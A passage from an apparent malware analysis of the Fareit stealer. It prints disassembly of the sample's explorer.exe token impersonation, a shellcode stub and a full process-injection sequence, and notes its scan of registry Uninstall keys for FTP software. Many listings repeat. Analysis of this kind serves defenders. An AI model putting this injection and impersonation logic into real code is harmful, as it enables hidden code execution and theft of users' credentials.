72      00402D6E   .  E8 1FDF0000   call 123.00410C92                        ; \CloseHandle
73      00402D73   >  8D85 CCFEFFFF lea eax,dword ptr ss:[ebp-0x134]
74      00402D79   .  50            push eax                                 ; /lppe
75      00402D7A   .  FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138]            ; |hSnapshot = NULL
76      00402D80   .  E8 B5DF0000   call 123.00410D3A                   ; \Process32Next
77      00402D85   .^ E9 F5FEFFFF   jmp 123.00402C7F
78      00402D8A   >  FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138]            ; /hObject = NULL
79      00402D90   .  E8 FDDE0000   call 123.00410C92                        ; \CloseHandle
80      00402D95   >  8BC3          mov eax,ebx
81      00402D97   .  5B            pop ebx                                  ;  123.00403E7B
82      00402D98   .  C9            leave
83      00402D99   .  C2 0400       retn 0x4

1 //Use CreateToolhelp32Snapshot to obtain the process snapshot

2 00402C55 . 6A 00 push 0x0 ; /ProcessID = 0x0

3 00402C57 . 6A 02 push 0x2

4 ; |Flags = TH32CS_SNAPPROCESS

5 00402C59 . E8 CAE00000 call 123.00410D28 ; \CreateToolhelp32Snapshot

7 //explorer.exe

8 00402C73 . 50 push eax ; /lppe

9 00402C74 . FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138] ; |hSnapshot = NULL

10 00402C7A . E8 AFE00000 call 123.00410D2E ; \Process32First

11 00402C7F > 23C0 and eax,eax

12 00402C81 . 0F84 03010000 je 123.00402D8A

13 00402C87 . 68 E2454100 push 123.004145E2 ; /Pattern = "explorer.exe"

14 00402C8C . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-0x110] ; |

15 00402C92 . 50 push eax ; |String = "€|?_"

16 00402C93 . E8 98E10000 call 123.00410E30 ; \StrStrIA

17 00402C98 . 23C0 and eax,eax

18 00402C9A . 0F84 D3000000 je 123.00402D73

19 00402CA0 . C785 C4FEFFFF>mov dword ptr ss:[ebp-0x13C],0x0

20 00402CAA . 8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-0x13C]

21 00402CB0 . 50 push eax

22 00402CB1 . FFB5 D4FEFFFF push dword ptr ss:[ebp-0x12C]

23 00402CB7 . FF15 B7434100 call dword ptr ds:[0x4143B7] ; KERNEL32.ProcessIdToSessionId

24 00402CBD . 8B95 C4FEFFFF mov edx,dword ptr ss:[ebp-0x13C]

25 00402CC3 . 23C0 and eax,eax

26 00402CC5 . 0F84 A8000000 je 123.00402D73

27 00402CCB . 3B55 F4 cmp edx,dword ptr ss:[ebp-0xC]

28 00402CCE . 0F85 9F000000 jnz 123.00402D73

29 00402CD4 . FFB5 D4FEFFFF push dword ptr ss:[ebp-0x12C] ; /ProcessId = 0x0

30 00402CDA . 6A 00 push 0x0 ; |Inheritable = FALSE

31 00402CDC . 68 00000002 push 0x2000000 ; |Access = 2000000

32 00402CE1 . E8 4EE00000 call 123.00410D34 ; \OpenProcess

33 00402CE6 . 23C0 and eax,eax

34 00402CE8 . 0F84 85000000 je 123.00402D73

35 00402CEE . 8945 F8 mov dword ptr ss:[ebp-0x8],eax

36 00402CF1 . 8D45 FC lea eax,dword ptr ss:[ebp-0x4]

37 00402CF4 . 50 push eax ; /phToken = 0012FD84

39 00402CFA . FF75 F8 push dword ptr ss:[ebp-0x8] ; |hProcess = 7C839AB0

40 00402CFD . FF15 EF434100 call dword ptr ds:[0x4143EF] ; \OpenProcessToken

41 00402D03 . 23C0 and eax,eax

42 00402D05 . 74 64 je short 123.00402D6B

43 00402D07 . FF75 FC push dword ptr ss:[ebp-0x4] ; KERNEL32.7C813E70

44 00402D0A . FF15 F3434100 call dword ptr ds:[0x4143F3] ; ADVAPI32.ImpersonateLoggedOnUser

45 00402D10 . 23C0 and eax,eax

46 00402D12 . 74 45 je short 123.00402D59

47 00402D14 . 43 inc ebx

48 00402D15 . C785 C0FEFFFF>mov dword ptr ss:[ebp-0x140],0x0

49 00402D1F . 8D85 C0FEFFFF lea eax,dword ptr ss:[ebp-0x140]

50 00402D25 . 50 push eax

51 00402D26 . 68 3F000F00 push 0xF003F

52 00402D2B . E8 E2E00000 call 123.00410E12 ; jmp to ADVAPI32.RegOpenCurrentUser

53 00402D30 . 0BC0 or eax,eax

54 00402D32 . 75 15 jnz short 123.00402D49

55 00402D34 . 83BD C0FEFFFF>cmp dword ptr ss:[ebp-0x140],0x0

56 00402D3B . 74 0C je short 123.00402D49

57 00402D3D . FFB5 C0FEFFFF push dword ptr ss:[ebp-0x140]

58 00402D43 . 8F05 E0404100 pop dword ptr ds:[0x4140E0] ; 123.00403E7B

59 00402D49 > 8B45 08 mov eax,dword ptr ss:[ebp+0x8]

60 00402D4C . 23C0 and eax,eax

61 00402D4E . 74 05 je short 123.00402D55

62 00402D50 . FF75 FC push dword ptr ss:[ebp-0x4] ; KERNEL32.7C813E70

63 00402D53 . 8F00 pop dword ptr ds:[eax] ; 123.00403E7B

64 00402D55 > EB 33 jmp short 123.00402D8A

65 00402D57 . EB 10 jmp short 123.00402D69

66 00402D59 > FF75 FC push dword ptr ss:[ebp-0x4] ; /hObject = 7C813E70

67 00402D5C . E8 31DF0000 call 123.00410C92 ; \CloseHandle

68 00402D61 . FF75 F8 push dword ptr ss:[ebp-0x8] ; /hObject = 7C839AB0

69 00402D64 . E8 29DF0000 call 123.00410C92 ; \CloseHandle

70 00402D69 > EB 08 jmp short 123.00402D73

71 00402D6B > FF75 F8 push dword ptr ss:[ebp-0x8] ; /hObject = 7C839AB0

72 00402D6E . E8 1FDF0000 call 123.00410C92 ; \CloseHandle

73 00402D73 > 8D85 CCFEFFFF lea eax,dword ptr ss:[ebp-0x134]

74 00402D79 . 50 push eax ; /lppe

75 00402D7A . FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138] ; |hSnapshot = NULL

76 00402D80 . E8 B5DF0000 call 123.00410D3A ; \Process32Next

77 00402D85 .^ E9 F5FEFFFF jmp 123.00402C7F

78 00402D8A > FFB5 C8FEFFFF push dword ptr ss:[ebp-0x138] ; /hObject = NULL

79 00402D90 . E8 FDDE0000 call 123.00410C92 ; \CloseHandle

80 00402D95 > 8BC3 mov eax,ebx

81 00402D97 . 5B pop ebx ; 123.00403E7B

82 00402D98 . C9 leave

83 00402D99 . C2 0400 retn 0x4

The Fareit sample is a VB program. In the execution process, it creates two processes and injects the code of the current process and ShellCode into the target process, making the new processes execute specific code. The following shows the ShellCode code:

1   00140000    E8 19000000     call 0014001E
2   00140005    05 FC010000     add eax,0x1FC
3   0014000A    8B08            mov ecx,dword ptr ds:[eax]
4   0014000C    89CE            mov esi,ecx
5   0014000E    8B48 08         mov ecx,dword ptr ds:[eax+0x8]           ; 123.00401C89
6   00140011    890E            mov dword ptr ds:[esi],ecx
7   00140013    8B48 0C         mov ecx,dword ptr ds:[eax+0xC]
8   00140016    894E 04         mov dword ptr ds:[esi+0x4],ecx
9   00140019    8B40 04         mov eax,dword ptr ds:[eax+0x4]
10      0014001C  - FFE0            jmp eax
11      0014001E    8B0424          mov eax,dword ptr ss:[esp]               ; 123.00401BF4
12      00140021    83E8 05         sub eax,0x5
13      00140024    C3              retn
14      00140025    E8 00000000     call 0014002A

1 00140000 E8 19000000 call 0014001E

2 00140005 05 FC010000 add eax,0x1FC

3 0014000A 8B08 mov ecx,dword ptr ds:[eax]

4 0014000C 89CE mov esi,ecx

5 0014000E 8B48 08 mov ecx,dword ptr ds:[eax+0x8] ; 123.00401C89

6 00140011 890E mov dword ptr ds:[esi],ecx

7 00140013 8B48 0C mov ecx,dword ptr ds:[eax+0xC]

8 00140016 894E 04 mov dword ptr ds:[esi+0x4],ecx

9 00140019 8B40 04 mov eax,dword ptr ds:[eax+0x4]

10 0014001C - FFE0 jmp eax

11 0014001E 8B0424 mov eax,dword ptr ss:[esp] ; 123.00401BF4

12 00140021 83E8 05 sub eax,0x5

13 00140024 C3 retn

14 00140025 E8 00000000 call 0014002A

The following shows the process in which the Fareit sample creates new processes and injects code into the new processes.

1   00E7034D    FF77 08         push dword ptr ds:[edi+0x8]
2   00E70350    FF77 0C         push dword ptr ds:[edi+0xC]
3   00E70353    6A 00           push 0x0
4   00E70355    6A 00           push 0x0
5   00E70357    6A 04           push 0x4
6   00E70359    6A 00           push 0x0
7   00E7035B    6A 00           push 0x0
8   00E7035D    6A 00           push 0x0
9   00E7035F    FF75 28         push dword ptr ss:[ebp+0x28]
10      00E70362    FF75 2C         push dword ptr ss:[ebp+0x2C]
11      00E70365    FFD0            call eax                                 ; CreateProcessW
12      
13      00E703F1    89FB            mov ebx,edi
14      00E703F3    81C3 74010000   add ebx,0x174
15      00E703F9    53              push ebx
16      00E703FA    6A 40           push 0x40
17      00E703FC    FFB7 6C010000   push dword ptr ds:[edi+0x16C]
18      00E70402    FF77 04         push dword ptr ds:[edi+0x4]              ; 123.00400000
19      00E70405    8B4F 08         mov ecx,dword ptr ds:[edi+0x8]
20      00E70408    FF31            push dword ptr ds:[ecx]
21      00E7040A    FF95 AC000000   call dword ptr ss:[ebp+0xAC]    ; KERNEL32.VirtualProtectEx
22      00E70410    6A 04           push 0x4
23      00E70412    68 00300000     push 0x3000
24      00E70417    FFB7 6C010000   push dword ptr ds:[edi+0x16C]
25      00E7041D    6A 00           push 0x0
26      00E7041F    6A FF           push -0x1
27      00E70421    FF95 9C000000   call dword ptr ss:[ebp+0x9C]             ; KERNEL32.VirtualAllocEx
28      00E70427    8985 A0000000   mov dword ptr ss:[ebp+0xA0],eax
29      00E7042D    6A 00           push 0x0
30      00E7042F    8B0F            mov ecx,dword ptr ds:[edi]
31      00E70431    FFB7 6C010000   push dword ptr ds:[edi+0x16C]
32      00E70437    FFB5 A0000000   push dword ptr ss:[ebp+0xA0]             ; 123.00410C73
33      00E7043D    FF77 04         push dword ptr ds:[edi+0x4]              ; 123.00400000
34      00E70440    8B57 08         mov edx,dword ptr ds:[edi+0x8]
35      00E70443    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
36      00E70445    FF57 18         call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory
37      00E70448    8B45 24         mov eax,dword ptr ss:[ebp+0x24]
38      00E7044B    C600 00         mov byte ptr ds:[eax],0x0
39      00E7044E    6A 00           push 0x0
40      00E70450    8B0F            mov ecx,dword ptr ds:[edi]
41      00E70452    FF71 54         push dword ptr ds:[ecx+0x54]
42      00E70455    FF75 24         push dword ptr ss:[ebp+0x24]
43      00E70458    FF77 04         push dword ptr ds:[edi+0x4]              ; 123.00400000
44      00E7045B    8B57 08         mov edx,dword ptr ds:[edi+0x8]
45      00E7045E    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
46      00E70460    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
47      
48      00E7046C    8B45 24         mov eax,dword ptr ss:[ebp+0x24]
49      00E7046F    C600 4D         mov byte ptr ds:[eax],0x4D
50      00E70472    6A 00           push 0x0
51      00E70474    6A 01           push 0x1
52      00E70476    FF75 24         push dword ptr ss:[ebp+0x24]
53      00E70479    FF77 04         push dword ptr ds:[edi+0x4]              ; 123.00400000
54      00E7047C    8B57 08         mov edx,dword ptr ds:[edi+0x8]
55      00E7047F    FF32            push dword ptr ds:[edx]
56      00E70481    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
57      
58      00E70495    66:51           push cx
59      00E70497    6A 00           push 0x0
60      00E70499    8B17            mov edx,dword ptr ds:[edi]
61      00E7049B    81C2 F8000000   add edx,0xF8
62      00E704A1    66:BB 2800      mov bx,0x28
63      00E704A5    66:0FAFD9       imul bx,cx
64      00E704A9    66:01DA         add dx,bx
65      00E704AC    FF72 10         push dword ptr ds:[edx+0x10]
66      00E704AF    8B5A 14         mov ebx,dword ptr ds:[edx+0x14]
67      00E704B2    035D 24         add ebx,dword ptr ss:[ebp+0x24]
68      00E704B5    53              push ebx
69      00E704B6    8B5A 0C         mov ebx,dword ptr ds:[edx+0xC]
70      00E704B9    035F 04         add ebx,dword ptr ds:[edi+0x4]           ; 123.00400000
71      00E704BC    53              push ebx
72      00E704BD    8B57 08         mov edx,dword ptr ds:[edi+0x8]
73      00E704C0    FF32            push dword ptr ds:[edx]
74      00E704C2    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
75      00E704C5    83F8 00         cmp eax,0x0
76      00E704C8    0F85 A1050000   jnz 00E70A6F
77      00E704CE    66:59           pop cx
78      00E704D0    66:49           dec cx
79      00E704D2    66:83F9 00      cmp cx,0x0
80      00E704D6  ^ 7D BD           jge short 00E70495
81      
82      00E7057A    6A 40           push 0x40
83      00E7057C    68 00300000     push 0x3000
84      00E70581    68 00100000     push 0x1000
85      00E70586    6A 00           push 0x0
86      00E70588    8B57 08         mov edx,dword ptr ds:[edi+0x8]
87      00E7058B    FF32            push dword ptr ds:[edx]
88      00E7058D    FF95 9C000000   call dword ptr ss:[ebp+0x9C]             ; KERNEL32.VirtualAllocEx
89      
90      00E705C2    6A 00           push 0x0
91      00E705C4    6A 08           push 0x8
92      00E705C6    89EB            mov ebx,ebp
93      00E705C8    81C3 B8000000   add ebx,0xB8
94      00E705CE    53              push ebx
95      00E705CF    FFB5 B4000000   push dword ptr ss:[ebp+0xB4]             ; 123.<ModuleEntryPoint>
96      00E705D5    8B57 08         mov edx,dword ptr ds:[edi+0x8]
97      00E705D8    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
98      00E705DA    FFD0            call eax                                 ; KERNEL32.ReadProcessMemory
99      00E705DC    6A 00           push 0x0
100     00E705DE    6A 04           push 0x4
101     00E705E0    89EB            mov ebx,ebp
102     00E705E2    81C3 B4000000   add ebx,0xB4
103     00E705E8    53              push ebx
104     00E705E9    8B9D B0000000   mov ebx,dword ptr ss:[ebp+0xB0]
105     00E705EF    81C3 FC010000   add ebx,0x1FC
106     00E705F5    53              push ebx
107     00E705F6    8B57 08         mov edx,dword ptr ds:[edi+0x8]
108     00E705F9    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
109     00E705FB    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
110     00E705FE    6A 00           push 0x0
111     00E70600    6A 04           push 0x4
112     00E70602    8B4F 04         mov ecx,dword ptr ds:[edi+0x4]           ; 123.00400000
113     00E70605    8B17            mov edx,dword ptr ds:[edi]
114     00E70607    034A 28         add ecx,dword ptr ds:[edx+0x28]
115     00E7060A    898D A0000000   mov dword ptr ss:[ebp+0xA0],ecx   ; KERNEL32.ReadProcessMemory
116     00E70610    89EB            mov ebx,ebp
117     00E70612    81C3 A0000000   add ebx,0xA0
118     00E70618    53              push ebx
119     00E70619    8B9D B0000000   mov ebx,dword ptr ss:[ebp+0xB0]
120     00E7061F    81C3 00020000   add ebx,0x200
121     00E70625    53              push ebx
122     00E70626    8B57 08         mov edx,dword ptr ds:[edi+0x8]
123     00E70629    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
124     00E7062B    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
125     00E7062E    6A 00           push 0x0
126     00E70630    6A 08           push 0x8
127     00E70632    89EB            mov ebx,ebp
128     00E70634    81C3 B8000000   add ebx,0xB8
129     00E7063A    53              push ebx
130     00E7063B    8B9D B0000000   mov ebx,dword ptr ss:[ebp+0xB0]
131     00E70641    81C3 04020000   add ebx,0x204
132     00E70647    53              push ebx
133     00E70648    8B57 08         mov edx,dword ptr ds:[edi+0x8]
134     00E7064B    FF32            push dword ptr ds:[edx]                  ; ntdll.7C99B1A0
135     00E7064D    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
136     
137     00E70655    58              pop eax                                  ; 00E70151
138     00E70656    8B9D B0000000   mov ebx,dword ptr ss:[ebp+0xB0]
139     00E7065C    8958 01         mov dword ptr ds:[eax+0x1],ebx
140     00E7065F    6A 00           push 0x0
141     00E70661    6A 08           push 0x8
142     00E70663    50              push eax
143     00E70664    FFB5 B4000000   push dword ptr ss:[ebp+0xB4]             ; 123.<ModuleEntryPoint>
144     00E7066A    8B57 08         mov edx,dword ptr ds:[edi+0x8]
145     00E7066D    FF32            push dword ptr ds:[edx]
146     00E7066F    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
147     
148     00E70677    58              pop eax                                  ; 00E70F80
149     00E70678    6A 00           push 0x0
150     00E7067A    6A 26           push 0x26
151     00E7067C    50              push eax
152     00E7067D    FFB5 B0000000   push dword ptr ss:[ebp+0xB0]
153     00E70683    8B57 08         mov edx,dword ptr ds:[edi+0x8]
154     00E70686    FF32            push dword ptr ds:[edx]
155     00E70688    FF57 18         call dword ptr ds:[edi+0x18]             ; ntdll.ZwWriteVirtualMemory
156     
157     00E706DF    6A 00           push 0x0
158     00E706E1    6A 00           push 0x0
159     00E706E3    6A 00           push 0x0
160     00E706E5    8B4D 70         mov ecx,dword ptr ss:[ebp+0x70]          ; KERNEL32.SetProcessDEPPolicy
161     00E706E8    51              push ecx                                 ; KERNEL32.SetProcessDEPPolicy
162     00E706E9    6A 00           push 0x0
163     00E706EB    6A 00           push 0x0
164     00E706ED    8B5F 08         mov ebx,dword ptr ds:[edi+0x8]
165     00E706F0    FF33            push dword ptr ds:[ebx]
166     00E706F2    FF95 84000000   call dword ptr ss:[ebp+0x84]  ; KERNEL32.CreateRemoteThread
167     
168     00E7076E    6A 00           push 0x0
169     00E70770    8B57 08         mov edx,dword ptr ds:[edi+0x8]
170     00E70773    FF72 04         push dword ptr ds:[edx+0x4]
171     00E70776    FFD0            call eax                      ; ntdll.ZwResumeThread

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

1 00E7034D FF77 08 push dword ptr ds:[edi+0x8]

2 00E70350 FF77 0C push dword ptr ds:[edi+0xC]

3 00E70353 6A 00 push 0x0

4 00E70355 6A 00 push 0x0

5 00E70357 6A 04 push 0x4

6 00E70359 6A 00 push 0x0

7 00E7035B 6A 00 push 0x0

8 00E7035D 6A 00 push 0x0

9 00E7035F FF75 28 push dword ptr ss:[ebp+0x28]

10 00E70362 FF75 2C push dword ptr ss:[ebp+0x2C]

11 00E70365 FFD0 call eax ; CreateProcessW

13 00E703F1 89FB mov ebx,edi

14 00E703F3 81C3 74010000 add ebx,0x174

15 00E703F9 53 push ebx

16 00E703FA 6A 40 push 0x40

17 00E703FC FFB7 6C010000 push dword ptr ds:[edi+0x16C]

18 00E70402 FF77 04 push dword ptr ds:[edi+0x4] ; 123.00400000

19 00E70405 8B4F 08 mov ecx,dword ptr ds:[edi+0x8]

20 00E70408 FF31 push dword ptr ds:[ecx]

21 00E7040A FF95 AC000000 call dword ptr ss:[ebp+0xAC] ; KERNEL32.VirtualProtectEx

22 00E70410 6A 04 push 0x4

23 00E70412 68 00300000 push 0x3000

24 00E70417 FFB7 6C010000 push dword ptr ds:[edi+0x16C]

25 00E7041D 6A 00 push 0x0

26 00E7041F 6A FF push -0x1

27 00E70421 FF95 9C000000 call dword ptr ss:[ebp+0x9C] ; KERNEL32.VirtualAllocEx

28 00E70427 8985 A0000000 mov dword ptr ss:[ebp+0xA0],eax

29 00E7042D 6A 00 push 0x0

30 00E7042F 8B0F mov ecx,dword ptr ds:[edi]

31 00E70431 FFB7 6C010000 push dword ptr ds:[edi+0x16C]

32 00E70437 FFB5 A0000000 push dword ptr ss:[ebp+0xA0] ; 123.00410C73

33 00E7043D FF77 04 push dword ptr ds:[edi+0x4] ; 123.00400000

34 00E70440 8B57 08 mov edx,dword ptr ds:[edi+0x8]

35 00E70443 FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

36 00E70445 FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

37 00E70448 8B45 24 mov eax,dword ptr ss:[ebp+0x24]

38 00E7044B C600 00 mov byte ptr ds:[eax],0x0

39 00E7044E 6A 00 push 0x0

40 00E70450 8B0F mov ecx,dword ptr ds:[edi]

41 00E70452 FF71 54 push dword ptr ds:[ecx+0x54]

42 00E70455 FF75 24 push dword ptr ss:[ebp+0x24]

43 00E70458 FF77 04 push dword ptr ds:[edi+0x4] ; 123.00400000

44 00E7045B 8B57 08 mov edx,dword ptr ds:[edi+0x8]

45 00E7045E FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

46 00E70460 FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

48 00E7046C 8B45 24 mov eax,dword ptr ss:[ebp+0x24]

49 00E7046F C600 4D mov byte ptr ds:[eax],0x4D

50 00E70472 6A 00 push 0x0

51 00E70474 6A 01 push 0x1

52 00E70476 FF75 24 push dword ptr ss:[ebp+0x24]

53 00E70479 FF77 04 push dword ptr ds:[edi+0x4] ; 123.00400000

54 00E7047C 8B57 08 mov edx,dword ptr ds:[edi+0x8]

55 00E7047F FF32 push dword ptr ds:[edx]

56 00E70481 FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

58 00E70495 66:51 push cx

59 00E70497 6A 00 push 0x0

60 00E70499 8B17 mov edx,dword ptr ds:[edi]

61 00E7049B 81C2 F8000000 add edx,0xF8

62 00E704A1 66:BB 2800 mov bx,0x28

63 00E704A5 66:0FAFD9 imul bx,cx

64 00E704A9 66:01DA add dx,bx

65 00E704AC FF72 10 push dword ptr ds:[edx+0x10]

66 00E704AF 8B5A 14 mov ebx,dword ptr ds:[edx+0x14]

67 00E704B2 035D 24 add ebx,dword ptr ss:[ebp+0x24]

68 00E704B5 53 push ebx

69 00E704B6 8B5A 0C mov ebx,dword ptr ds:[edx+0xC]

70 00E704B9 035F 04 add ebx,dword ptr ds:[edi+0x4] ; 123.00400000

71 00E704BC 53 push ebx

72 00E704BD 8B57 08 mov edx,dword ptr ds:[edi+0x8]

73 00E704C0 FF32 push dword ptr ds:[edx]

74 00E704C2 FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

75 00E704C5 83F8 00 cmp eax,0x0

76 00E704C8 0F85 A1050000 jnz 00E70A6F

77 00E704CE 66:59 pop cx

78 00E704D0 66:49 dec cx

79 00E704D2 66:83F9 00 cmp cx,0x0

80 00E704D6 ^ 7D BD jge short 00E70495

82 00E7057A 6A 40 push 0x40

83 00E7057C 68 00300000 push 0x3000

84 00E70581 68 00100000 push 0x1000

85 00E70586 6A 00 push 0x0

86 00E70588 8B57 08 mov edx,dword ptr ds:[edi+0x8]

87 00E7058B FF32 push dword ptr ds:[edx]

88 00E7058D FF95 9C000000 call dword ptr ss:[ebp+0x9C] ; KERNEL32.VirtualAllocEx

90 00E705C2 6A 00 push 0x0

91 00E705C4 6A 08 push 0x8

92 00E705C6 89EB mov ebx,ebp

93 00E705C8 81C3 B8000000 add ebx,0xB8

94 00E705CE 53 push ebx

95 00E705CF FFB5 B4000000 push dword ptr ss:[ebp+0xB4] ; 123.<ModuleEntryPoint>

96 00E705D5 8B57 08 mov edx,dword ptr ds:[edi+0x8]

97 00E705D8 FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

98 00E705DA FFD0 call eax ; KERNEL32.ReadProcessMemory

99 00E705DC 6A 00 push 0x0

100 00E705DE 6A 04 push 0x4

101 00E705E0 89EB mov ebx,ebp

102 00E705E2 81C3 B4000000 add ebx,0xB4

103 00E705E8 53 push ebx

104 00E705E9 8B9D B0000000 mov ebx,dword ptr ss:[ebp+0xB0]

105 00E705EF 81C3 FC010000 add ebx,0x1FC

106 00E705F5 53 push ebx

107 00E705F6 8B57 08 mov edx,dword ptr ds:[edi+0x8]

108 00E705F9 FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

109 00E705FB FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

110 00E705FE 6A 00 push 0x0

111 00E70600 6A 04 push 0x4

112 00E70602 8B4F 04 mov ecx,dword ptr ds:[edi+0x4] ; 123.00400000

113 00E70605 8B17 mov edx,dword ptr ds:[edi]

114 00E70607 034A 28 add ecx,dword ptr ds:[edx+0x28]

115 00E7060A 898D A0000000 mov dword ptr ss:[ebp+0xA0],ecx ; KERNEL32.ReadProcessMemory

116 00E70610 89EB mov ebx,ebp

117 00E70612 81C3 A0000000 add ebx,0xA0

118 00E70618 53 push ebx

119 00E70619 8B9D B0000000 mov ebx,dword ptr ss:[ebp+0xB0]

120 00E7061F 81C3 00020000 add ebx,0x200

121 00E70625 53 push ebx

122 00E70626 8B57 08 mov edx,dword ptr ds:[edi+0x8]

123 00E70629 FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

124 00E7062B FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

125 00E7062E 6A 00 push 0x0

126 00E70630 6A 08 push 0x8

127 00E70632 89EB mov ebx,ebp

128 00E70634 81C3 B8000000 add ebx,0xB8

129 00E7063A 53 push ebx

130 00E7063B 8B9D B0000000 mov ebx,dword ptr ss:[ebp+0xB0]

131 00E70641 81C3 04020000 add ebx,0x204

132 00E70647 53 push ebx

133 00E70648 8B57 08 mov edx,dword ptr ds:[edi+0x8]

134 00E7064B FF32 push dword ptr ds:[edx] ; ntdll.7C99B1A0

135 00E7064D FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

136

137 00E70655 58 pop eax ; 00E70151

138 00E70656 8B9D B0000000 mov ebx,dword ptr ss:[ebp+0xB0]

139 00E7065C 8958 01 mov dword ptr ds:[eax+0x1],ebx

140 00E7065F 6A 00 push 0x0

141 00E70661 6A 08 push 0x8

142 00E70663 50 push eax

143 00E70664 FFB5 B4000000 push dword ptr ss:[ebp+0xB4] ; 123.<ModuleEntryPoint>

144 00E7066A 8B57 08 mov edx,dword ptr ds:[edi+0x8]

145 00E7066D FF32 push dword ptr ds:[edx]

146 00E7066F FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

147

148 00E70677 58 pop eax ; 00E70F80

149 00E70678 6A 00 push 0x0

150 00E7067A 6A 26 push 0x26

151 00E7067C 50 push eax

152 00E7067D FFB5 B0000000 push dword ptr ss:[ebp+0xB0]

153 00E70683 8B57 08 mov edx,dword ptr ds:[edi+0x8]

154 00E70686 FF32 push dword ptr ds:[edx]

155 00E70688 FF57 18 call dword ptr ds:[edi+0x18] ; ntdll.ZwWriteVirtualMemory

156

157 00E706DF 6A 00 push 0x0

158 00E706E1 6A 00 push 0x0

159 00E706E3 6A 00 push 0x0

160 00E706E5 8B4D 70 mov ecx,dword ptr ss:[ebp+0x70] ; KERNEL32.SetProcessDEPPolicy

161 00E706E8 51 push ecx ; KERNEL32.SetProcessDEPPolicy

162 00E706E9 6A 00 push 0x0

163 00E706EB 6A 00 push 0x0

164 00E706ED 8B5F 08 mov ebx,dword ptr ds:[edi+0x8]

165 00E706F0 FF33 push dword ptr ds:[ebx]

166 00E706F2 FF95 84000000 call dword ptr ss:[ebp+0x84] ; KERNEL32.CreateRemoteThread

167

168 00E7076E 6A 00 push 0x0

169 00E70770 8B57 08 mov edx,dword ptr ds:[edi+0x8]

170 00E70773 FF72 04 push dword ptr ds:[edx+0x4]

171 00E70776 FFD0 call eax ; ntdll.ZwResumeThread

Registry Operations

The main function of registry operations is as follows:

The Fareit sample traverses the registry entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ to view the software installed on the target host system. 【The Fareit sample checks whether FTP software is installed.】

The following are several registry entries intercepted:

1   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook  UninstallString
2   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX  UninstallString 
3   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Branding UninstallString
4   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager UninstallString
5   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
6   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectAnimation
7   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
8   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
9   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Explorer Suite_is1
10      SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
11      SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HaoZip
12      SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IDNMitigationAPIs
13      SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

1 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook UninstallString

2 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX UninstallString

3 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Branding UninstallString

4 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager UninstallString

5 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager

6 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectAnimation

7 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

8 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

9 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Explorer Suite_is1

10 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

